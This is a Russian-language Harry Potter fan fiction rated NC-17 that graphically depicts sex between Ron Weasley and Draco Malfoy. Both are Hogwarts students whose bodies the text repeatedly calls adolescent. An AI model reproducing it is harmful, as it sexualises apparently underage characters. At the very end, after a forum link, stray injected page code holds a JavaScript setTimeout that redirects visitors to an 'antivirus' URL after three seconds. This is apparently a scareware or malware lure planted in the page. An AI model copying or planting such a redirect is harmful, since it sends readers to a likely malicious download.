Почти сон, почти в руку.

Автор: Кот Бегемот
Пейринг: Дракороны
Жанр: PWP
Рейтинг: NC-17
Архивация: свободная, с уведомлением автору
Дисклеймер: как обычно
Саммари: чиво? *нимб на голове* Драко – честная давалка.:)
Примечание: написано для Джемини ;)

Вот уже чего-чего, а подниматься с уютной и ласкающей тело постели Рону совершенно не хотелось. Томность утренней прохлады заманивала обратно в мир снов, заглушая возгласы однокурсников, просыпавшихся под гулкое эхо разносившегося в спальне голоса Шеймуса. Кто-то лениво переругивался с ним, кто-то откровенно посылал в Запретный Лес, но Финниган, взявший за привычку будить гриффиндорцев громким «вставайте, черти, Снейп заждался!», не обращал на ворчащих никакого внимания. И каждый раз, когда Шеймус упоминал декана Слизерина, Уизли всегда хотелось спрятать голову под подушку и досмотреть очередную серию своих явно не детских фантазий. Нет, Снейп появлялся в его грёзах только в самый неподходящий момент со своим вечным «минус ынцать баллов и трусы в придачу». На подштанники и чёртовы баллы Рону, в сущности, было начхать, но внезапно возникающий на его пути профессор сводил на нет возможность догнать белокурую тень, что так изящно виляла бёдрами совсем невдалеке. Вот и сегодня была та же фигня: Уизли потратил почти весь сон, чтобы догнать голопопого Малфоя, рассекающего на какой-то фаллоимитаторной метле. И настиг ведь почти. Оставалось только протянуть руку и схватить белобрысика за задницу, как вдруг в воздухе завис чёрт знает откуда взявшийся Снейп и завёл свою пластинку про опостылевшие баллы. А Драко, тем временем, смылся за горизонт… Так что с почти сбывшейся надеждой столкнуть слизеринский секс-эпил и прижать его к какой-нибудь стенке пришлось расстаться до следующей ночи. А как хотелось…

Рон лениво свесил ноги с кровати и пошарился в поисках тапок – подпрыгивать на холодном полу как-то вовсе не хотелось. С удивлением обнаружив в тумбочке свежую пару носков, Уизли полусонно напялил их и приоткрыл занавеску.

- Какого хрюкотуна, Колин?!

Криви с каким-то щенячьим восторгом и явно не без удовольствия окинул Рона блудливым взглядом, на минуту задержавшись на утренней подростковой выпуклости в чересчур свободных шортах Уизли. Затем Колин как-то странно вздохнул и, оторвавшись, наконец, от трусов Рона, выпалил на одном ноте:

- Гарри ждёт тебя на квиддитчном поле…

- И давно?

- Уже полчаса.

- Чёрт, лучше он сову прислал…

- Мы не хотели тебя будить.

Рон удивлённо уставился на Криви:

- Я не ошибся, ты сказал «мы»? Вы с Гарри?

Колин тут же смутился и покраснел.

- Эй, рыжий, хватит трясти своими причиндалами перед малышом! – гогот Шеймуса наполнил спальню. В ту же минуту половина занавесок распахнулась, обнаружив за ними заспанные глаза гриффиндорских зевак. – Вали в душ, пока не занято, а то сейчас Дин оккупирует его не меньше, чем на час.

Около окна тут же послышалось хриплое нецензурное выражение.

- Чёрт, действительно, - Рон снова повернулся к Колину, снова уставившегося на его шорты. – Криви, сделай одолжение, перестань таращиться на мои трусы. В них нет ничего такого, чего нет у тебя.

Криви сразу как ветром сдуло. Рон, сдёрнув с вешалки полотенце, почти бегом направился в душ – в словах Шеймуса не было ни капли ехидства: задержись он на пару минут, пришлось бы прыгать не меньше получаса вокруг двери, пока Дин соизволил бы открыть кабинку. Проверив, хорошо ли заперт замок и наколдовав антиотпирающее заклятие, Рон сдёрнул с себя шорты и нырнул под горячие струи воды. Клубы пара, обволакивающие и ласкающие сознание, почти сразу вернули парня в сон, в котором наглый слизеринец бессовестно удирал от Уизли, не забывая при этом, крутить задницей в разные стороны. Рон почти машинально опустил руку на среагировавший от грёз члён и крепко сжал его. Волна дикого желания освободиться от тяжести, прочно засевшей в паху, тут же накрыла Рона. Пальцы легко заскользили по стволу, настойчиво оттягивая плоть вниз, подставляя обнажённую часть под брызги разлетающейся от тела воды. Член настойчиво требовал мягкого и напряженного уюта, движения в нём, ощущения жара. Рон повернулся к стене и, оперевшись одной рукой на неё, погрузил стонущую плоть в сжатый кулак. Где-то невдалеке, в клубах пара, сразу возникла запрокинутая голова Малфоя, чьё тело недвусмысленно выгибалось под жадными руками невидимого партнёра. Рон чуть расслабил кулак, пропуская член глубже, и медленно, словно во сне, начал двигаться в нём, то убыстряясь, то замедляясь. Кабинка тут же наполнилась хриплыми звуками животного наслаждения, заглушаемыми струями воды, равнодушно стекающими вниз. В призрачном тумане Уизли отчётливо видел, как Драко подаётся назад, стараясь как можно глубже ощутить в себе член любовника. Картина была настолько яркой, что Рон, прохрипев в последний раз, дёрнулся и кончил на стену. Капли воды, стекающей по ней, тут же подхватили белёсую влагу и умчали прочь. Отдышавшись, Рон опустился на пол, поднял голову, подставив лицо под жесткие повеселевшие струи.

Рон так и не смог ответить себе на вопрос, с чего же всё началось. Какой момент стал переломным в его жизни, когда он понял, что не просто симпатизирует этой слизеринской выскочке, но и откровенно хочет его? Впрочем, так ли уж откровенно? В своих отношениях они были противниками, стремящимися уколоть друг друга при первой же возможности. Рону не хватало ни сил, ни едкости, да и желания, кроме как пустить в ход кулаки или палочку, дабы стереть эту бесшабашную ухмылку с лица Малфоя. Более того, Рона совершенно не привлекал никто из парней, что иногда крутились около него с весьма масляными глазами. Взять хотя бы того же Криви. Поняв, что Гарри ему не обломится, Колин начал совсем по-детски ухаживать за Уизли, чем вызывал у Рона непонятное раздражение. Ему достаточно было поманить пальцем, и Криви прыгнул бы в его объятия. И всё было бы более-менее понятно. И что Рон – гей, и что его бой-френд – гриффиндорец. Никто бы от Уизли не отвернулся, разве только Лаванда прыснула бы от смеха, поняв, почему оказываемые авансы встречают такое тупое равнодушие. Но Малфой в роли бой-френда… При всём, Рон даже не мог понять, влюбился ли он или всего лишь потакает своим разбушевавшимся не на шутку гормонам. Сейчас, к примеру, когда его похоть удовлетворена, он с удовольствием вмазал бы слизеринцу за вчерашний трюк на занятиях по алхимии. Даже если Драко и симпатизировал бы ему, то слишком тяжёл плен условностей, в котором они навечно погрязли своей школьной враждой. Даже Поттеру было бы легче…

Настойчивое громыхание в дверь вернуло Рона из мира вопросов на жёсткий пол душевой. Уизли кое-как вытерся полотенцем, не удосужившись причесать рыжие вихры, напялил чистый комплект белья и неохотно открыл дверь, столкнувшись нос к носу с Дином.

- Ты чего, пытаешься побить мой рекорд? Криви уже два раза прибегал…

- Я задремал… - неопределённо ответил Рон, отстраняя недоумённого Томаса.

- Да? А я подумал, дрочишь…

Рон не обратил внимания на вечно озабоченного Дина и, швырнув грязные шмотки на кровать, бегом помчался на квиддитчное поле: до завтрака оставался почти час и в приближение матча вечно соперничающих команд каждая из них старалась выкроить хоть полчаса для тренировок. Около квиддитчной раздевалки его перехватил Гарри:

- Где тебя носит, чёрт возьми? Ведь вчера договаривались пораньше начать…

- А чего не разбудил?

Гарри замялся. Говорить о том, что он, в сущности, и не ночевал в спальне, не хотелось. Тем более, Рону.

Войдя в раздевалку, Уизли ошарашено уставился на раскиданные по ней зелёные мантии слизеринцев.

- Не понял…

- Эти уроды тренируются на второй половине поля, а Снейп «любезно» попросил нас быть гостеприимными, пока в их раздевалке папаша Малфоя делает охренительный ремонт.

- Только не говори мне, что его сынок, это ходячее слизеринское мурло, переодевалось здесь.

- Здесь, - отрезал Поттер, усмехнувшись при виде бегающих гномиков на трусах Рона.

- Хватит ржать, Гарри! А то подумаю, что я тебе нравлюсь как парень.

- Нравишься, - чуть лукаво усмехнулся Поттер. – Но у меня на тебя не встанет, слишком привык к твоей заднице.

- А к переднице?

- Бери метлу! – хохотнул Гарри, хлопая Рона по плечу…

… Тренировка не задалась с самого начала. Рон всё время отвлекался на норовившего пролететь мимо Малфоя, постоянно возвращающего Уизли к ночным фантазиям. Гарри лишь хмурил брови и постоянно что-то бубнил про какие-то новые обманки для нападающих. Рон слушал его вполуха, то и дело поглядывая на упругую задницу Малфоя, обтянутую зелёной, чуть отливающей на солнце, тканью. Тот, как на грех, то поднимался на метле, то снова опускался, то прижимался к ней всем телом. Поэтому Рон так и не понял, чего же от него хотел Гарри, и, когда тренировка закончилась, приземлился недалеко от Малфоя, чтобы ещё раз рассмотреть поджарую фигуру белобрысого хорька. Хорёк, меж тем, не обратил на Уизли никакого внимания и даже не оглянулся. Малфой во главе своей команды продефилировал в раздевалку, возле которой столпились насупившиеся гриффиндорцы, поджидавшие Рона, дабы высказать ему пару ласковых. В воздухе запахло явным раздражением.

- Рон!

- Ну?

- Что это за нафиг такой?

- Где?

- Не прикидывайся дурачком. Сегодняшняя тренировка была из рук вон…

- Я просто не выспался. И жрать хочу.

Гарри чуть ослабил хватку, вспомнив, что Рон вчера так и не появился на ужине, промучившись с желудком до самой ночи.

- Подожди…

- Кого?

- Там слизеринцы переодеваются…

- Ну и хрен с ними, я не собираюсь ждать их королевское величество.

Рон решительно толкнул дверь и, не обращая внимания на скривившиеся лица слизеринцев, плюхнулся на скамейку. Остальные гриффиндорцы настороженно последовали его примеру. Смущаясь, многие из них предпочли закрыться полотенцами и отвернуться к своим ящичкам. Слизеринцы же, напротив, открыто демонстрировали прелести подростковых тел, не обращая никакого внимания на команду соперников. Рон, лениво стаскивая с себя треники, пытался как можно незаметнее отыскать в их толпе Малфоя и убедиться, что классная хорьковая задница – лишь его ночные фантазии. Однако, когда обнаружил его краем глаза, тот уже был уже в каких-то серых подтягивающих трусах. Гарри, заметивший взгляд Рона, лишь повёл плечами, вряд ли догадываясь о цели пристального внимания друга к Малфою. Тот, в свою очередь, не торопился. Слизеринец долго складывал свою форму, отпуская язвительные шуточки в адрес своих приятелей, затем, не торопясь, причесался, но, кажется, вовсе не собирался поворачиваться к Уизли спиной. Малфой копошился, пока в раздевалке не остались только он, Гарри и Рон. Поттер беззвучно чертыхнулся, пытаясь убедить друга собираться побыстрее.

- Гарри, ты иди, нам с хорьком поговорить нужно.

Малфой даже ухом не повёл.

- О чём, интересно узнать?

- О вчерашнем.

- Рон, я не собираюсь стоять за дверью…

- Иди, говорю. Мы мило побеседуем, обещаю. Ну дам ему пару раз в глаз…

- Очень смешно.

- Иди. Я догоню тебя через пару минут.

Гарри пожал плечами. В конце концов, может, этим двоим действительно нужно поговорить? Пусть разберутся – вчера Снейп из-за выходки Малфоя стянул у Гриффиндора действительно неприличную сумму баллов.

Дождавшись, пока за Поттером закроется дверь, Рон поднялся и неторопливо подошёл к слизеринцу. Тот лишь поднял брови и… повернулся к Уизли спиной. У Рона перехватило дыхание: трусы Малфоя были полностью открытыми. Слизеринец потянулся за штанами, но Уизли ловко перехватил его руку.

- Вот что, Малфой…

Тот, резко дёрнувшись в ответ, повернулся и скривился в усмешке.

- Ты что-то сказал, рыжий дурень? Я весь во внимании.

- Предупреждаю тебя, если ты ещё раз…

- … опрокинешь мне на голову котелок с касторовым зельем… Опрокину, будь уверен, если не сменишь своё дустовое мыло на шампунь.

- У меня шампунь…

- Из конского навоза?

- Заткнись, Малфой!

- Если я заткнусь, ты так и будешь молча стоять передо мной с оттопырившейся ширинкой.

Не дожидаясь, пока Рон очухается от выпада, Малфой дёрнулся к нему, зажав оттянувший ткань брюк член Уизли бедром.

- Хочешь трахнуть, так и скажи, только избавь меня от своей деревенской болтовни. И не морочь мне голову.

Пальцы Малфоя умело развязали шнуровку брюк Рона и легко скользнули вниз, сразу нащупав дёрнувшийся в ответ член ошарашенного Уизли.

- Нравится, рыжий?

Рон неопределённо промычал. Ему хотелось вырваться из опьяняющего контакта и убежать – тот Драко, из ночных фантазий, был другим. Но близость тела слизеринца, столько раз вызывавшего оргазм в мечтах и не только, дурманила и сковывала ноги. Рон непроизвольно потянулся губами к щеке Малфоя, но тот лишь резко мотнул головой.

- Я не собираюсь с тобой целоваться, Уизли. Не собираюсь признаваться в любви и прочих глупостях. Хочешь заниматься сексом – занимайся, хочешь соплей – вали к своему Криви.

- Я не сплю с ним, - вяло выдохнул Рон, чувствуя, как пальцы Малфоя настойчиво сдёргивают с него штаны вместе с трусами.

- Мне наплевать, с кем ты спишь. Я занимаюсь сексом ради секса.

- Я так не хочу, - Рон дёрнулся и скривился.

- А так?

Малфой опустился на колени и нежно провёл языком по вене. Рон тихо застонал в ответ. Оттянув губами плоть, слизеринец несколько раз провёл языком по открывшейся головке и мягко погрузил член в рот. Уизли, зажмурив глаза, вцепился руками в волосы Малфоя, стараясь заставить того двигаться быстрее и увереннее. Тонкие губы скользили по члену, изредка останавливались, чтобы потом с удвоенной силой продолжать ласкать его ствол. Рон уже готов был кончить, как Малфой вдруг отстранился и повернулся к маленькому рюкзачку.

- Ты сволочь, Малфой…

- Не больше, чем ты думаешь, Уизли. Я не собираюсь три дня ходить с разорванной задницей.

Слизеринец вытащил голубой тюбик, презерватив и снова повернулся.

- Сделаешь или мне самому?

Рон облизал пересохшие губы.

- Ты сам…

Малфой пожал плечами, повернулся с Рону спиной и, оперевшись одной рукой на скамейку, нагнулся и раздвинул ноги. Слизеринец легко ввел тюбик в себя и сжал его пальцами – Уизли лишь ошарашено смотрел, не в силах произнести ни звука. Драко несколько раз шевельнул ягодицами и повернул голову к Рону:

- Ну что, так и будешь стоять, как истукан?

- Сон в руку…

- Чего?

Рон подошёл к Малфою и неуверенно спросил:

- Ты даже свои трусы не снимешь?

- Мне это без надобности. Я не собираюсь давать тебе возможность лапать мой член руками. Ну?

Рон, дрожа от близости задницы Драко, осторожно взял того за бёдра и аккуратно стал вводить свой член. Малфой чуть дёрнулся и застонал.

- Тебе больно?

В ответ Драко лишь яростно дёрнулся назад, насаживаясь на ствол, и сжал ягодицы. Рон оторопел.

- Чёрт возьми, Уизли, ты будешь двигаться или мне усесться на тебя сверху?

Рон с изрядной долей осторожности начал двигаться, отмечая, как легко скользит член. Убедившись, что Малфою не больно, он чуть ускорился, отмечая, как Драко начал постанывать от удовольствия. Вид собственного члена, исчезающего в заднице Малфоя, настолько ошеломил Рона, что он был готов кончить только от самой этой картины.

- Уизли, положи свою руку мне на трусы и гладь мой член.

Рон чуть наклонился вперёд, одной рукой обхватил Драко за грудь и приподнял к себе, а второй крепко сжал член Малфоя через трусы. Слизеринец застонал ещё громче. Рон скрёб пальцами ткань, пробегаясь по всей длине, пока не услышал финальный вскрик Драко и не почувствовал, как сжались мускулы вокруг его собственного члена, а трусы Малфоя не стали сырыми и липкими. Рон вышел из Драко, сдёрнул презерватив, сделав пару движений по заднице Малфоя, брызнул тому на спину.

Слизеринец медленно выпрямился и, не удосуживаясь ни вытереться, ни сменить трусы, начал одевать штаны.

- Малфой?

- Ну?

- И что, на этом всё закончится?

Драко равнодушно пожал плечами.

- А ты чего хотел? Или тебя тянет признаться мне в любви?

Рон отвернулся и стал молча одеваться. Минуты три никто из них не проронил ни слова.

- Уизли?

- Да?

- Тебе… было хорошо со мной?

- Да.

- Мне тоже. Но у нас ничего с тобой не получится. Разве что редкие встречи, подобные этой.

- Насколько редкие?

- Слушай, Уизли. Ты не первый и не последний парень, который хочет со мной потрахаться. Я тоже хочу заниматься сексом и занимаюсь им. Захочешь встречаться, я не против. Но не собираюсь разыгрывать из себя бой-френда парня, который боится признаться, что он – гей.

- Я не…

- Ты готов об этом рассказать своему Поттеру? О том, что трахаешься с Драко Малфоем?

- …

- Тогда отвали.

Драко, застегнув рубашку, вскинул рюкзачок и направился к выходу.

- Малфой, это шантаж.

- Я знаю, - ответил тот, не оборачиваясь. – Но правила игры устанавливаю не я.

- Если я расскажу Гарри… всем… ты будешь… моим бой-френдом?

Малфой на минуту остановился в дверях, повернул голову и чуть скривился в странной, но чуть нежной усмешке:

- Поцеловать меня, по крайней мере, ты сможешь.

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>